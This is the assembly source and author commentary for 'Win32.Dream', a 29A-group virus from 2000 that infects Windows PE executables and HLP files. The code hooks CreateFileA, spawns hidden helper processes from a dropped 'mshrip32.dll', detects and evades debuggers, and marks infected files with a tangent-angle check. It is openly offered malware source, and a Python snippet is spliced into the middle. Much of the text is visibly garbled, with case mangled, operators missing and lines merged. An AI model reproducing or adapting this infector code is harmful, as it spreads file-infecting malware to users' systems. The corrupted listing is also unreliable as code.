;
; Win32.Dream by Prizzy/29A
; Hello people, here is my third virus, especially when it is designed for
; the whole Win32 platform. It infects only EXE (PE - Portable Executable)
; files and also HLP (Windows Help file format).
;
; When an infected EXE file is started, EIP goes through my easy polymorphic
; engine, which isn't so important in this virus, then it hooks the CreateFileA
; function, installs itself into memory and only then it can put EIP to
; the host - there are two returns, one for EXE, the other for HLP files.
;
; With might and mind I wanted to use in it only the best from the new high-tech
; VX methods we know. And I think there is nothing worse than a virus equipped with
; InterProcess Communication (IPC). I also changed my coding style and
; this source is the most optimized I could make it.
;
;
; Detailed information
;
;
; 1. InterProcess Communication (IPC)
;
; You could see one IPC virus (Vulcano) by Benny/29A, but I used this feature
; another way than he did. His IPC virus is only in one process and it can
; communicate with other viruses in another process.
;
; The parts of my Win32.Dream virus work in several processes and in fact
; it behaves like one whole virus. After installing to memory, the virus will
; remove itself from the memory of the infected program.
;
;
; 1.1. Creating processes
;
; This virus is divided into seven 'independent' functions which have their own
; process. To create a new process I would build a dropper and via
; CreateProcessA I would run them.
;
; The dropper waits until the new function for its process is ready; if yes, it
; shares two mapped blocks (OpenFileMappingA) for that process (its global
; memory and the function's body) and creates a thread on the function. The
; process can't terminate, it can only sleep. All created processes are
; hidden in Windows 95, not in WinNT/2K (it's more complex).
;
;
; 1.2. IPC in action
;
; The hooked CreateFileA function retrieves control, sets a flag for a certain
; process and awakes it. That process finishes its own task and returns the
; results.
;
;
; 1.3. Global memory
;
; It's necessary to share some important information among all processes.
; These are:
;
; [thandle]:     When the dropper creates a new thread, the returned handle
;                is stored here. It indicates the thread's error code.
; [th_mempos]:   Here is stored the name of the function's mapped object.
;                The dropper will open that memory area.
; [process]:     hProcess and ProcessId values of all created processes,
;                needed for opening/running them.
; [apiz]:        The addresses of all the APIs I call are in this place.
; [active]:      If another process wants to run me, it sets a certain flag
;                here and the thread tests it.
; [paramz]:      This is the place where the virus stores some parameters
;                shared among processes (see below).
; [vbody]:       Here is the copy of the virus, useful for changing values
;                inside and for the poly engine.
; [filename]:    The future infected filename. The new CreateFileA function
;                stores the name here.
; [cinfected]:   Two FPU memory buffers, one for creating the infection mark,
;                the other for checking it.
; [poly_vbody]:  Output from the polymorphic engine.
;
;
; 1.4. Parameters
;
; As I wrote above, I have to get some parameters of the input processes.
; Here is the description of them:
;
; [1st param]:   Output of the polymorphic engine, the new size of the virus.
; [2nd param]:   File size for checksum (poly size already included).
; [3rd param]:   The name of the mapping file (for OpenFileMappingA).
; [4th param]:   a. File size for check_infected (without poly size).
;                b. Output of checksum.
; [5th param]:   Input for check_infected; if '1', then it wants to get
;                an angle for create_infected.
; [6th param]:   Terminate all processes? (WinNT/2000 only)
; [7th param]:   Terminate all processes? (Win95/98 only)
;                (because of a Win95/98 kernel bug)
;
;
; 1.5. Termination of all processes
;
; I remember it was a nut for me, but of course I had to solve it. At first
; I changed the flags of the process (SetErrorMode; it means the process will
; not show any message box if it executes bad instructions), then I had to
; check if the host still lives. In Win95/98 I have discovered a kernel bug,
; so that I couldn't use the WinNT version (OpenProcess) to check if the host
; still exists, because Win95/98 doesn't delete its process ID handle.
; Win95 - you can only read some value from the memory allocated by the host.
; WinNT - that allocated memory is opened by another process, you can't
; identify it.
;
;
; 1.6. The scheme of all processes
;
; [ASCII diagram garbled in extraction. Recoverable labels: the new CreateFileA
;  API function, infect_file, infect_hlp, infect_exe, check_infected,
;  poly_engine, create_infected, checksum.]
;
;
; 2. Optimalization and comments
;
; Sometimes I heard my last virus Win32.Crypto is too huge, and also some
; people had fun at my expense (Benny, Mort - gotcha bastards!) saying that my next
; virus would be bigger than one megabyte. I wanted to optimize the next one
; and I've not told them, so I think it'll be a surprise for them. I pro-
; Nevertheless I've had a taste of the second side and now I can return
; myself without any mass problems. But now I can say the virus is more
; optimized than Benny's bits and pieces. The source code is not com-
; mented enough because I think not many people will taste something like
; IPC is. If yes, they can contact me.
;
;
; 3. Check infected routine
;
; Long ago in Win32.Crypto I tried to use a unique math technique for how to
; check if the file is infected. Now I thought up a new, more complex way.
; At first from the infected file I'll compile the equation, for example:
;
;   y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x
;
; and I'll get two points on that curve, for example x1 = 4 and x2 = 7. Then
; I will calculate what angle is between the tangents to the curve at those
; two points; it means I have to calculate the derivative y' of that
; equation, and if I know y'(x1) and y'(x2) then I will determine:
;
;   alpha = arctg | (y'(x1) - y'(x2)) / (1 + y'(x1) * y'(x2)) |
;
; If the angle is greater than e.g. 75 degrees, the file is infected.
;
; This algorithm has been coded only for fun, so that I know we have easier
; methods, but I couldn't call any to remembrance.
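; The angle test from section 3 worked through in Python, as an added example
; that is not code from the original source. The polynomial, the points x1 = 4
; and x2 = 7 and the 75-degree rule are the page's; the term-list representation,
; the comparison tolerance and the handling of perpendicular tangents
; (1 + m1*m2 = 0, which a plain division would reject) are this example's own.

```python
import math

# Polynomial as a list of (coefficient, exponent) terms. The constructed
# example is the page's own y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x.
EXAMPLE_TERMS = [(32, 7), (192, 3), (-8212, 5), (-72, 1)]


def derivative(terms):
    """Differentiate term by term: c*x^n -> (c*n)*x^(n-1); constants vanish."""
    return [(c * n, n - 1) for c, n in terms if n != 0]


def evaluate(terms, x):
    """Evaluate a term list at x (exact for integer coefficients and points)."""
    return sum(c * x ** n for c, n in terms)


def tangent_angle_degrees(terms, x1, x2):
    """Angle (0..90 degrees) between the tangents to y(x) at x1 and x2.

    tan(alpha) = |(m1 - m2) / (1 + m1*m2)| with m = y'(x). atan2 is used so
    that 1 + m1*m2 == 0 (perpendicular tangents) yields 90 degrees instead
    of a ZeroDivisionError.
    """
    d = derivative(terms)
    m1, m2 = evaluate(d, x1), evaluate(d, x2)
    return math.degrees(math.atan2(abs(m1 - m2), abs(1 + m1 * m2)))


def exceeds_threshold(terms, x1, x2, threshold=75.0):
    """The rule stated in the text: an angle greater than e.g. 75 degrees."""
    return tangent_angle_degrees(terms, x1, x2) > threshold


def recomputed_angle_matches(terms, x1, x2, stored_angle, tol=1e-9):
    """Recompute the angle from the stored equation and points and compare it
    with a stored value (the 'Compare the results' step of the check routine);
    the tolerance is an assumption of this example, not the page's."""
    return abs(tangent_angle_degrees(terms, x1, x2) - stored_angle) <= tol
```

; For the page's example polynomial the slopes at x = 4 and x = 7 are both very
; large and negative, so the tangents are nearly parallel and the angle is far
; below 75 degrees.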
;
; 4. Pearls behind the scene
;
; * Only two weeks before release I finally thought up the virus name.
; * At one time, during coding, I stopped writing and I hadn't coded this
;   virus for two months. Later when I started again I couldn't remember
;   what that code does and so on.
; * At present there exist over one fifty backup copies.
; * The worst part of the virus was the dropper; there were many changes
;   because of Win9x and WinNT compatibility, and many bugs were there.
; * After an hour of coding I unwillingly deleted the new version, so that
;   I had to save more than one gigabyte from FAT32 on another hard disk.
;   Only there I found that lost version.
; * The best thing I like on the whole virus is the main comment.
; * The working directory was 'E:\X_WIN\' and this file's name was 'WIN.AS!'.
; * Last week I was looking for help on mIRC
;
;
; ... but I haven't found much help there (although Bumblebee helped
;   me with another bug).
; * During the whole coding I've read five books and three film scripts.
;
;
; 5. List of greetings
;
; Darkman        The master of the good optimistic mood.
; Bumblebee      Thanks for your help during coding.
; Billy Belcebu  So, our communication has started yet.
; GriYo          All the time a busy man.
; Lord Julus     Waiting for your new virus and its meta engine.
; Mort           So did you think this source would be bigger than
;                one megabyte? Sorry, maybe later :).
; J.P.           I look forward to the future with you, dude.
; Ratter         No, no. Stop reading and let you show us what you
;                are hiding inside.
; VirusBuster    Here is that secret bin with the savage poly engine, as
;                you wrote on #virus.
; Benny          It's the best in the end, Benny. Haha, at last this
;                source is optimized and you will stop worrying me.
;                Thanks for all you have ever done for me.
;
; ... and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
; 6. Contact me
;
; Prizzy@coderz.net
; http://prizzy.cjb.net
;
;
; (c)oded by Prizzy/29A, June 2000
;
;
.486P
.Model flat, stdcall
Locals
INCLUDE INCLUDE / MZ.INC
INCLUDE INCLUDE / PE.INC
EXTRN EXITPROCESS: PROC
EXTRN CREATEFILEA: PROC
EXTRN Messageboxa: Proc
; Program start
.DATA
DB?
.code
; Virus code starts here
vStart Proc
Pusha
Call $ 5
POP EBP
SUB EBP, $ - vStart-1; Get Delta
vsize equ file_end - vStart
Mov Eax, [ESP VSIZE 32]
Sub Eax, 1000H
INF_EP EQU $ -4
MOV [EBP HA_MODULE-VSTART], EAX
Add Eax, FG0 - VStart 1000H
ORG_EP EQU $ -4; Get Startup Address
Push EAX
CALL GET_K32_APIS
JMP __RETURN
@ANTI_E:
Call kill_st
Call Check_resident; try to create it
Call create_process_maps
.IF BYTE PTR [EBP ERROR-VSTART] == 0
Call hookapi
.endif
__Return:
POP DWORD PTR [ESP 28]
POPA
SUB ESP, -VSIZE-4
DB 90H, 90H
JMP EAX; EXE BACK
XOR EAX, EAX; HLP BACK
Ret 8
vStart ENDP
GET_K32_APIS PROC
PUSH 20
Mov Eax, [ESP VSIZE 48]; Find K32 Address
Sub Ax, AX
POP ECX
@@ 1: .if Word PTR [EAX]! = 'ZM'
Sub eax, 65536
Loop @@ 1
JMP GK32A_F_A
.endif
CMP BYTE PTR [EBP __ RETURN 11-VStart], 90H
JZ $ 5
POP EAX
JMP __RETURNPUSH EAX EAX; Get K32 Tables
Add Eax, [EAX 60]
POP EBX EDI
Add EBX, [EAX 78H]
MOV CL, 0
@@ 3: Push EBX ECX
Mov EDX, [EBX 32]
Add Edx, EDI
@@ 4: MOV ESI, [EDX]; Calculate Next CRC32 FUNC.
Add ESI, EDI
PUSH ECX EDX EBX; CRC32 Algorithm
STC
SBB ECX, ECX
MOV EDX, ECX
@@ 4_crc32_nbyte:
Sub Eax, EAX
SUB EBX, EBX
Lodsb
XOR Al, Cl
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
@@ 4_Crc32_nbit:
SHR BX, 1
RCR AX, 1
JNC @@ 4_Crc32_no
XOR AX, 08320H
XOR bx, 0edb8h
@@ 4_Crc32_no:
DEC DH
JNZ @@ 4_Crc32_nbit
XOR ECX, EAX
XOR EDX, EBX
CMP Byte PTR [ESI-1], 0
JNZ @@ 4_Crc32_nbyte
@@ 4_Crc32_fin:
Not Edx
NOT ECX
POP EBX
MOV EAX, EDX
ROL EAX, 16
MOV AX, CX
POP EDX ECX
CMP [EBP K32_CRCS ECX * 4-VStart], EAX; CRC32 == My FUNC?
JZ @@ 5
SUB EDX, -4
JMP @@ 4
GK32A_F_A:
JMP GK32A_F
@@ 3_a:
JMP @@ 3
@@ 5: Sub EDX, [EBX 32]; Get Addr of the New Func.
Sub EDX, EDI
SHR EDX, 1
Add Edx, [EBX 36]
Add Edx, EDI
Movzx EDX, Word Ptr [EDX]
SHL EDX, 2
Add Edx, [EBX 28]
MOV EDX, [EDX EDI]
Add Edx, EDI
POP ECX EBX
Movzx EAX, Word PTR [EBP ECX * 2 K32_ADDRS-VSTART]
NEG AX
MOV [EBP EAX], EDX; Store ITS
@@ 5a: Inc ECX
Mov Eax, EDI
ROL EAX, 8
SUB Al, 0BFH
JZ @@ 5b
CMP ECX, 14
JZ @@ 5a
@@ 5b: CMP ECX, Count
JNZ @@ 3_a
Push p_number 1; Update Sleep Function
POP ECX
@@ 6: Movzx Eax, Word PTR [EBP Process_Maps ECX * 2-VStart-2]
NEG AX
MOV [EBP EAX 2], EDX
@@ 7: loop @@ 6
Test Al, 0C3H
GK32A_F EQU $ -1
POP EAX
Push CS; Anti-emulator
Lea Eax, [EBP @ Anti_e-VStart]
Push EAX
Retf
GET_K32_APIS ENDP
KILL_ST Proccall @ SNT 10
@ S95: DB '//./sice', 0; Name Drivers
@SNT: DB '//./ntice' ,0
POP EBX
Call Open_FILE; OPEN SOFTICE 95/98 OR
JZ @KS_NT; Softice NT / 2K Driver
Dec EAX
Push EAX
MOV EAX, 0
LPCloseHandle EQU $ -4
Call EAX
JMP @KS_KILL; KILL Process
@KS_NT:
Sub EBX, @ S95- @ SNT; Open the Second Driver
Call Open_File
JZ @KS_DOS
Dec EAX
Call [EBP LPCLOSEHANDLE-VSTART]
@KS_KILL:
Push EAX
MOV EAX, 0
LPEXITPROCESS EQU $ -4
Call EAX
@KS_DOS:
CMP DWORD PTR FS: [32], 0; TD32 ETC.
JNZ @ks_kill
RET
Open_ALWAYS_FILE:
Sub Eax, Eax; Create File Always
Push Eax; USEful for Droppers
MOV CL, 80H
Push ECX 2
JMP $ 8
Open_file:
Sub Eax, EAX; Open File in EBX
Push EAX EDX 3
CDQ
MOV DL, 0C0H
Bswap edx
PUSH EAX EAX EDX EBX
MOV EAX, 0
LpCreateFile EQU $ -4
Call EAX
INC EAX
RET
KILL_ST ENDP
Check_resident Proc
Push EBP 1 0; CREATE MUTEX or GET IF IT
MOV EAX, 0; HAS been create => in MEM
LpCreateMutexa EQU $ -4
Call EAX
XCHG EAX, EBX
MOV EAX, 0
LpGetLastError EQU $ -4
Call EAX
XCHG Eax, ESI
OR ESI, ESI
JZ @CR_F
Push EBX
MOV EAX, 0
LPRELESEMUTEX EQU $ -4
Call EAX
@Cr_f: OR ESI, ESI
POP EAX
JNZ __RETURN
JMP EAX
Check_resident ENDP
CREATE_PROCESS_MAPS PROC
MOV BYTE PTR [EBP ERROR-VSTART], 1
Call Build_Dropper; Create Dropper in Sys Dir
JC CPM_FNODEAL
MOV EAX, 0
LpGetCurrentProcessid Equ $ -4
Call EAX
MOV [EBP IF_PARENT-VSTART], EAX
SUB EBX, EBX
Push 80h
CPM_Shared_Mem EQU $ -4
Push 7
MOV EAX, 0
LPseTerrorMode EQU $ -4
Call EAX
POP ECX
Lea EDI, [ECX VBODY]
Push ECX
MOV ESI, EBP
MOV ECX, VSIZE
REP MOVSB
CPM_NXPROC:
POP EAX
Lea EDI, [EAX 8 EBX * 8]
Push EAX
MOV [EAX], EDI
Call @@ 1
DD 0,0,0,0; hproc, hthr, procid, thrid @@ 1: POP ESI
Lea Eax, [EBP VSIZE]
Push ESI EAX 68
POP ECX
@@ 1a: MOV [EAX], CH
INC EAX
Loop @@ 1A
PUSH ECX ECX 640 1 ECX ECX 80H ECX
CPM_CMDLINE EQU $ -5
Inc ECX
MOV DWORD PTR [EAX-6 * 4], ECX
MOV EAX, 0
LpCreateProcessa EQU $ -4
Call EAX
OR EAX, EAX
JZ CPM_Failed
Lodsd; Get HProcess and Processid
Stosd
Lodsd
Lodsd
Mov Edx, EAX
Stosd
Movzx ESI, Word PTR [EBP Process_maps EBX * 2-VStart]
NEG SI
Add ESI, EBP
Movzx ECX, Word PTR [ESI-2]
Mov Eax, 4096
Call malloc
XCHG Eax, EDI
Rep Movsb; Copy One To MEM
POP ESI
PUSH ESI
Movzx Eax, Byte PTR [EBP M_SIGN-2-VStart]
MOV [ESI 4], EAX; Thread Memory Sign
MOV [ESI], ECX; Active Flag
Push ESI COUNT-2
Lea EDI, [ESI APIZ]
Lea ESI, [EBP K32_ADDRS-VSTART]
POP ECX
@@ 2: Sub Eax, EAX
Lodsw
NEG AX
MOV EAX, [EBP EAX]
Stosd
Loop @@ 2
POP ESI
Push EDX ECX 1F0FFFH
MOV EAX, 0
LpregisterServiceProcess EQU $ -4
OR EAX, EAX
JZ CPM_Winnt
Push 1 edx
Call EAX
CPM_WINNT:
MOV EAX, 0
LpoProProcess Equ $ -4; Create Inside Thread from
Call Eax; The Dropper
XCHG EAX, ECX
JECXZ CPM_FAILD
Mov EDX, 0
LPWAITFORSINGLEOBJECT EQU $ -4
Call Edx, ECX, 40
Lodsd
NOT EAX
XCHG EAX, ECX
JECXZ CPM_FAILD
Inc EBX
CMP BL, P_NUMBER
JNZ CPM_NXPROC
Mov Al, Bh; Remove the Virus from the
MOV ECX, (Mem_end - NewcreateFile); Current File, Live on The
Lea EDI, [EBP NewCreateFile-vStart]; Other Places Inside Win32
Rep Stosb
MOV BYTE PTR [EBP ERROR-VSTART], CL
CPM_Failed:
POP EAX
OR EBX, EBX
JNZ CPM_FNODEAL
Call Mdealloc
CPM_FNODEAL:
MOV EAX, [EBP CPM_CMDLINE-VSTART]
MDEAlloc:
Push Eax; Deallocate Shared Memory
MOV EAX, 0
LPUNMAPVIEWOFFILE EQU $ -4
Call EAX
RET
Error DB 0
CREATE_PROCESS_MAPS ENDPBUILD_DROPPER PROC
Mov Eax, 260; Generate Dropper filename
Call malloc
MOV [EBP CPM_CMDLINE-VSTART], EAX
Mov Edi, EAX
Push 7fh Eax; no more kil of 0x80 Chars
MOV EAX, 0
LpgetsystemDirectory EQU $ -4
Call Eax; Get System Directory
OR EAX, EAX
JZ BD_FAILED
Call BD_FNAME
DB '/ mshrip32.dll' ,0; hmmm, My Dropper Name
BD_FNAME:
POP ESI
Push 14
MOV EBX, EDI
Add Edi, EAX
POP ECX
REP MOVSB
Call Open_ALWAYS_FILE; CREATE ITS
JZ BD_FAILED
Dec EAX
Push EAX
Mov ESI, 1024; Alloc Memory for Dropper
Call malloc
XCHG EAX, EDI; EDI = Output, All IS ZERO
MOV Eax, 60000
Push EDI
Lea ESI, [EBP DROPPER_DATA-VSTART]
Call malloc
XCHG EBX, EAX
MOV [EBP CPM_SHARED_MEM-VSTART], EBX
MOV EAX, 0
Lpgetversion EQU $ -4
Call EAX
XOR ECX, ECX
Bt Eax, 63
ADC EDI, ECX
MOV [EBX PARAMZ (7-1) * 4], EDI
POP EDI
Push EDI
MOV Al, [EBP M_SIGN-2-VStart]
MOV [ESI 224], Al; Noone Knows What Is IT
BD_READ:; Create Exe Pe Dropper
XOR EAX, EAX
Lodsb
CMP Al, -1; End of Data?
JZ BD_DONE
Add Edi, Eax; Next Movement
Lodsb
XCHG EAX, ECX
BD_WRITE:
Lodsb
Stosb; Save Data
LOOP BD_WRITE
JMP BD_READ
E8 EQU 0e8
BD_DONE:
PUSH 0
Call @@ 2
DD?
@@ 2: push 1024
Push DWORD PTR [ESP 12]; DropPers Body
Push DWORD PTR [ESP 20]; File Handle
MOV EAX, 0
Lpwritefile EQU $ -4
Call EAX
Push Eax DWORD PTR [ESP 8]
Call [EBP LPCLOSEHANDLE-VSTART]
POP ECX EAX EAX; WRITE ERROR?
Jecxz bd_failed
Test Al, 0F9h
BD_FAILED EQU $ -1
RET
RADIX 16; Compressed [Dropper EXE (PE) 1024 BYTES]
Dropper_data Equ this Byte
DB 0, 5, 4DH, 5A, 90, 0, 3, 3, 1, 4, 3, 2, 0FF, 0FF, 2, 1, 0B8, 7, 1, 40, 23, 1, 0C0, 83, 2
DB 50, 45, 2, 8, 4C, 1, 1, 0, 7F, 6A, 4, 38, 8, 7, 0E0H, 0, 0FH, 1, 0BH, 1, 6, 6, 1, 2, 6 ,2
DB 0C, 10, 3, 1, 10, 3, 1, 10, 4, 1, 40, 2, 1, 10, 3, 1, 2, 2, 1, 4, 7, 1, 4, 8, 1 20, 3, 1, 2dB 2, 2, 0E6, 3BH, 2, 1, 2, 5, 1, 10, 2, 1, 10, 4, 1, 10, 2, 1, 10, 6, 1, 10,0bh, 2,88,10
DB 2, 1, 28, 54, 1, 10, 2, 1, 8, 1BH, 4, 2EH, 32, 39, 41, 4, 1, 0C8, 4, 1, 10, 3, 1, 2, 3 ,1
DB 2, 0E, 1, 40, 2, 1, 0c0, 20, 2, 0B8H, 10, 0A, 7E, 0E8, 45, 0, 0, 0, 96, 0E8, 0, 0, 0, 0
DB 5DH, 89, 75, 9, 0EBH, 2, 90, 90, 0BbH, 0, 0, 0, 0, 83, 3BH, 0, 75, 1E, 66, 0C7, 45, 6
DB 0EBH, 28, 0E8, 1E, 0, 0, 0, 33, 0C9, 53, 51, 53, 50, 51, 51, 0B8, 0, 0, 0, 0, -1, 0D0
DB 0F7, 0D0, 89, 3, 6A, 0A, 0B8, 0, 0, 0, 0, 0CBH, 0DH, 0EBH, 0CBH, 0ADH, 56, 0EBH, 7
DB 0E8, 2, 0, 0, 41, 0, 33, 0F6, 0BF, 1F, 0, 0F, 0, 6A, 1, 57, 0B8, 0, 0, 0, 0, - 1, 0D0
DB 56, 56, 56, 57, 50, 0B9, 0, 0, 0, -1, 0D1, 0C3, E8, 0, 0, 0, 0, -1, 25, 0, 10, 40, 0
DB 0, 0, 0B0, 10, 0A, 2, 0BeH, 10, 3, 1, 10, 16, 2, 0B8, 10, 6, 0FH, 96, 1, 50, 69, 65, 0
DB 47, 44, 49, 33, 32, 2E, 64, 6C, 6C, 0FF
RADIX 10
Build_Dropper ENDP
Malloc Proc
Pusha; Allocate Shared Memory
XCHG EBX, EAX
SUB ESI, ESI
Inc Byte Ptr [EBP M_SIGN-2-VStart]
Call m_sign
DB "@", 0
m_sign:
PUSH EBX ESI 4 ESI 0-1
MOV EAX, 0
LpCreateFilemappinga EQU $ -4
Call EAX
Dec EAX
JZ M_Failed
INC EAX
PUSH EBX ESI ESI 2 EAX
MOV EAX, 0
LPMAPVIEWOFFILE EQU $ -4
Call EAX
m_failed:
MOV [ESP 28], EAX
POPA
OR EAX, EAX
RET
Malloc ENDP
HOOKAPI PROC
MOV EBX, 0
HA_MODULE EQU $ -4
CMP Word PTR [EBX], 'ZM'
Jnz ha_failed
Movzx ESI, Word PTR [EBX 60]
Add ESI, EBX
CMP Word PTR [ESI], 'EP'
Jnz ha_failed
Mov Eax, [ESI 80H]
Add Eax, EBX
FK32: MOV ESI, EAX
MOV ESI, [ESI 12]
CMP [ESI EBX], 'NREK'
JZ Fkok
SUB EAX, -20
JMP FK32
Fkok: Mov Edx, [EAX 16]
Add Edx, EBX
CMP DWORD PTR [EAX], 0
JZ Ha_failed
Push Edx
MOV ESI, [EAX]
Add ESI, EBX
Mov EDX, ESI
Sub Eax, EAX
FKLP: CMP DWORD PTR [EDX], 0
JZ Ha_failed2
CMP DWORD PTR [EDX 3], 80H
JZ FINC
MOV ESI, [EDX]
Lea ESI, [ESI EBX 2]
Call Fnamdb "Createfilea", 0
FNAM: POP EDI
FCOM: Push 12
POP ECX
REPE CMPSB
Jecxz FAPI
FINC: Inc EAX
SUB EDX, -4
JMP FKLP
FAPI: SHL EAX, 2
Add Eax, [ESP]
XCHG EBX, EAX
MOV EAX, [EBX]
MOV ECX, [EBP CPM_SHARED_MEM-VSTART]
MOV [ECX VBODY NewCreateFile 1-VStart], EAX
Lea Eax, [ECX VBODY NewCreateFile-vStart]
MOV [EBX], EAX
POP ECX
RET
Ha_failed2:
POP EAX
Ha_failed:
POP EAX
JMP __RETURN
HOOKAPI ENDP
DB "Win32.dream, (c) Oded by Prizzy / 29A", 13, 10
DB "The Greetz Go To All 29a Vx Coderz", 13, 10
NewcreateFile Proc
Push 80h
OldcreateFile EQU $ -4
Pusha
Call $ 5
POP EBP
SUB EBP, $ - VSTART-1
MOV EBX, [EBP CPM_SHARED_MEM-VSTART]
Lea EDI, [EBX VBODY VSIZE]
MOV Word PTR [EDI-VSIZE __ RETURN 11-VStart], 9090H
MOV ESI, [ESP 7 * 4 12]
NCFC: LODSB
Stosb
OR Al, Al
JNZ NCFC
Lea EDI, [EBX ACTIVE]
Lea ESI, [EBX Process]; Infect_File HProcess, Procid
Lodsd
XCHG EBX, EAX
Lodsd
MOV BYTE PTR [EDI], 1; Active Thread
Push EAX 0 1F0FFFH
Call [EBP LPOPENPROCESS-VSTART]
XCHG EAX, ECX
Jecxz ncf_failed
NCFW: PUSH 40 EBX
Call [EBP LPWAITFORSINGLEOBJECT-VSTART]
CMP Byte Ptr [EDI], 0
JNZ NCFW
NCF_FAILED:
POPA
RET
NewcreateFile Endp
Start_thread Macro Thread
Pusha; Threads GDELTA
Push 80h; Sleep Function
Call $ 5
POP EBP
Sub EBP, $ - Thread-1
MOV ESI, [ESP 40]
IFE ST_COUNT NE 0
IF_shared_mem EQU $ -4
Push 80H 0 1F0FFFH
IF_Parent EQU $ -11
Call [ESI APIZ 12 * 4]; OpenProcess
XCHG Eax, ESI
XCHG EAX, EBX
OR ESI, ESI
JNZ $ 11; Terminate All Processes
Inc ESI
MOV [EBX PARAMZ (6-1) * 4], ESI
JMP IFEX
PUSH ESI
Call [EBX APIZ 1 * 4]; CloseHandle
MOV ESI, EBX
Else
Push 1
POP EDI
CMP [ESI PARAMZ (6-1) * 4], EDI; Terminate this process? JNZ $ 4
JMP EDI
ENDIF
MOV EAX, [ESI Paramz (7-1) * 4]
Test Al, 1
JZ $ 4
Mov Al, [EAX]
Lea EDI, [ESI ACTIVE ST_COUNT]
Push EDI
CMP Byte Ptr [EDI], 0
JZ @@ End
ENDM
ST_COUNT = 0
END_THREAD MACRO THREAD
ST_COUNT = ST_COUNT 1
Mov Edi, [ESP]
MOV Byte Ptr [EDI], 0
@@ End: POP EDI EAX; Sleep Function
Call Eax, 2
POPA; don't terminate
JMP Thread
ENDM
DW Check_infected-infect_file
Infect_file proc
Start_thread infect_file
Lea ESI, [EBX VBODY VSIZE]
Ifex: lodsb
CMP Al, '.'
JNZ IFEX
Dec ESI
Lodsd
OR EAX, 20202020H
MOV EBX, [ESP 44]
Lea EDI, [EBX Active 4]
Lea ESI, [EBX Process 8 * 4]; Infect_exe HProcess, Procid
CMP EAX, 'EXE.'
JZ IF_2
CMP EAX, 'PLH.'
JNZ if_failed
IF_CALL_HLP:
SUB ESI, 8; Infect_HLP
Dec Edi
IF_2: LODSD
Push EAX
Lodsd
MOV BYTE PTR [EDI], 1; Active Infect_exe (_HLP)
Push EAX 0 1F0FFFH
Call [EBX APIZ 4 * 12]; OpenProcess
XCHG EAX, ECX
JECXZ IF_FAILED - 1
IF_R: POP EAX
Push EAX 40 EAX
Call [EBX APIZ 4 * 13]; WaitforsingleObject
CMP Byte Ptr [EDI], 0
JNZ IF_R
POP EAX
IF_failed:
END_THREAD INFECT_FILE
Infect_file endp
DW create_infected-check_infected
Check_infected proc
Start_thread check_infected
XCHG EBX, ESI
XOR ESI, ESI
CMP [EBX Paramz (5-1) * 4], 1
JZ CI_NOMEM
Other_Process_Mem Macro Shared_Mem, Param; Get Mem from Other Process
Call $ 7
DB "1", 0
PUSH 1 4
Call [Shared_Mem APIZ 24 * 4]; OpenFileMappinga
XOR ECX, ECX
Push EAX ECX ECX ECX 4 EAX
Call [Shared_Mem APIZ 7 * 4]; MapViewoffile
Push EAX
XCHG Eax, ESI
ENDM
Other_Process_Mem EBX, 4
CI_NOMEM:
Add ESI, [EBX PARAMZ (4-1) * 4] MOV ECX, [ESI-4-TBYTE]; Number of the Terms in A
OR ECX, ECX; Equation
JZ CI_FAILED
CMP ECX, 8
JNBE CI_FAILED
SUB ESP, 128
Fsave [ESP]
Push ECX
Imul ECX, - (TBYTE TBYTE)
SUB ECX, TBYTE TBYTE 4 TBYTE
LEA ESI, [ESI ECX]; Data Starts Here
Lea EDI, [EBX VBODY VSIZE 260]
CMP [EBX Paramz (5-1) * 4], 1
JNZ $ 8
Lea EDI, [EBX VBODY VSIZE 260 CI_SIZE / 2]
NEG ECX
Push EDI
REP MOVSB
POP ESI ECX
PUSH ECX ESI
FLD TBYTE PTR [ESI TBYTE]; DeriVation of the Equations
FLD ST (0); You'll Get Two Tangents
FLD TBYTE PTR [ESI]
Fmul
FLD1
Fsubp St (2), ST
FSTP TBYTE PTR [ESI]
FSTP TBYTE PTR [ESI TBYTE]
SUB ESI, - (TBYTE TBYTE)
Loop $ - 21
POP ESI ECX
SUB ESP, TBYTE TBYTE
FLDZ
FLDZ
FSTP TBYTE PTR [ESP]
FSTP TBYTE PTR [ESP TBYTE]
PUSH ESI ECX
Imul Eax, [ESP], TBYTE TBYTE; Involution of The Equations
FLD TBYTE PTR [ESI]
FLD TBYTE PTR [ESI TBYTE]
FLD TBYTE PTR [ESI EAX TBYTE]
FLD TBYTE PTR [ESI EAX]
FLD ST (2)
FLD ST (4)
FXCH ST (2)
Lea EDX, [EBP ($ 32) -Check_infected]
Push Edx
FYL2X; OVER Natural Logarithm
FLD ST (0)
Frndint
FSUBR ST (1), ST
FXCH
FCHS
F2XM1
FLD1
Faddp
Fscale
FSTP ST (1)
Fmul
RET
FLD TBYTE PTR [ESP TBYTE 2 * DWORD]
Faddp
FSTP TBYTE PTR [ESP TBYTE 2 * DWORD]
Call $ - 35; We've Two Points on The Curve
FLD TBYTE PTR [ESP 2 * DWORD]
Faddp
FSTP TBYTE PTR [ESP 2 * DWORD]
SUB ESI, - (TBYTE TBYTE)
DEC DWORD PTR [ESP]; Next Term in the equation
JNZ $ - 85
POP ECX ECX
FLD TBYTE PTR [ESP TBYTE]; Calculate An Angle of To
FLD TBYTE PTR [ESP]; Two Tangents of the equation
FLD ST (1)
FLD ST (1)
FSUB
FXCH ST (2)
Fmul
FLD1
Fadd
FDIVFABS
FLD1
Fpatan
Push 180; Radian -> Angle
FIMUL DWORD PTR [ESP]
FLDPI
fdiv
POP EAX
SUB ESP, - (TBYTE TBYTE)
MOV Eax, 2 * TBYTE DWORD
CMP DWORD PTR [EBX PARAMZ (5-1) * 4], 1
JNZ $ 12
Sub Eax, - (DWORD-CI_SIZE / 2)
FLD ST (0)
FSTP TBYTE PTR [ESI EAX]
FLD TBYTE PTR [ESI EAX]
FSUB
SUB ESP, TBYTE
FSTP TBYTE PTR [ESP]
CMP DWORD PTR [ESP TBYTE-DWORD], 0; Compare The Results
Lahf
SUB ESP, -TBYTE
Wait
Fnrstor [ESP]
SUB ESP, -128
SAHF
JNZ CI_FAILED
Push 1
POP EAX
MOV [EBX Paramz (4-1) * 4], EAX
JMP CI_FINISH
Ci_failed:
XOR EAX, EAX
MOV [EBX Paramz (4-1) * 4], EAX
CI_FINISH:
CMP [EBX Paramz (5-1) * 4], 1
JZ $ 8
Call [EBX APIZ 8 * 4]; UnmapViewoffile
Call [EBX APIZ 1 * 4]; CloseHandle
End_thread check_infected
